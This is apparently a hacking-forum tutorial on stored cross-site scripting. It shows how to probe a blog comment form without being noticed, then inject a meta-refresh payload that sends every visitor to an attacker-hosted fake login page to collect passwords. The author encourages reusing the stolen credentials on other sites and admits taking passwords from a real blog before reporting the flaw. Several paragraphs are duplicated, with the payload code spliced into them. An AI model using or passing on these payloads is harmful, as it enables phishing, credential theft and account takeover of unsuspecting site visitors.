Main:
A basic tut on XSS, how to test it, how to use this Vulnerability in a more interesting way.
Ok, alot of you know what XSS is but some of you dont. Its basically the injection of HTML/Javascript etc. into a form or input area. I recently used XSS in the interesting way i will present below on a blog site. Ok, so you arrive on site, you wanna be able to find out if its vulnerable to XSS without being to suspiciouse. Obviously if you type in and it turns out not to work, your gonna be conspicuous and probably end up getting banned from the site.(which you may or may not care about) Anyhow, so you come to a form, this can be a Shoutbox, Chat area, Comment Form, Registration Page, Login, etc. In this example, i'll use the comment form to a blog, since thats what i did on the blog site i recently encountered.(Of course i was nice enough to report it , but only after getting a couple passes and havin some fun) So try injecting first, then if it doesnt go through, they might just think you were tryin to italisize your words, just for kicks. If it goes through and in the comment area you see the words are italisized and no tags, than presto, XSS VULNERABLE!! Okay, so now you can go ahead and do the skiddish way of XSS injection and put in your javascript alert. Ooor you could set up a redirection to a Fake Login or Phishing page you set up etc. Ok, so first you go and make your fake login page on whatever host.
And of course, make it look EXACTLY like the login for the BlogSite<<for example>>.
---So now every time somone views the injected blog, they'll be redirected to your fake login, then leading to them using it (thinking, oops, got logged out somehow) then giveing you there login info. And if you know other sites those people go on, you can probably use the login on those too. See a majority of people use the same password at least, on every site they go to, i confess, i do on most sites. Soo anyway you get my point, this is a much more effective (in my opinion) method to using XSS injections. YOU can be SKIDDISH and put a oh so terrifing javascript alert. Orrrr you can get some good ol' passes. Your choice, guess thats it, love ya HBH'ers . PEACE. B)
<script> javascript:alert (/owned/)</script> <i>Hey</i>And of course, make it look EXACTLY like the login for the BlogSite<<for example>>.
<html>
<head>
<meta http-equiv="Refresh" content="0;URL=http://www.myphishinpage.com/login.php">
</head>
</html>
---So now every time somone views the injected blog, they'll be redirected to your fake login, then leading to them using it (thinking, oops, got logged out somehow) then giveing you there login info. And if you know other sites those people go on, you can probably use the login on those too. See a majority of people use the same password at least, on every site they go to, i confess, i do on most sites. Soo anyway you get my point, this is a much more effective (in my opinion) method to using XSS injections. YOU can be SKIDDISH and put a oh so terrifing javascript alert. Orrrr you can get some good ol' passes. Your choice, guess thats it, love ya HBH'ers . PEACE. B)
Posted by 
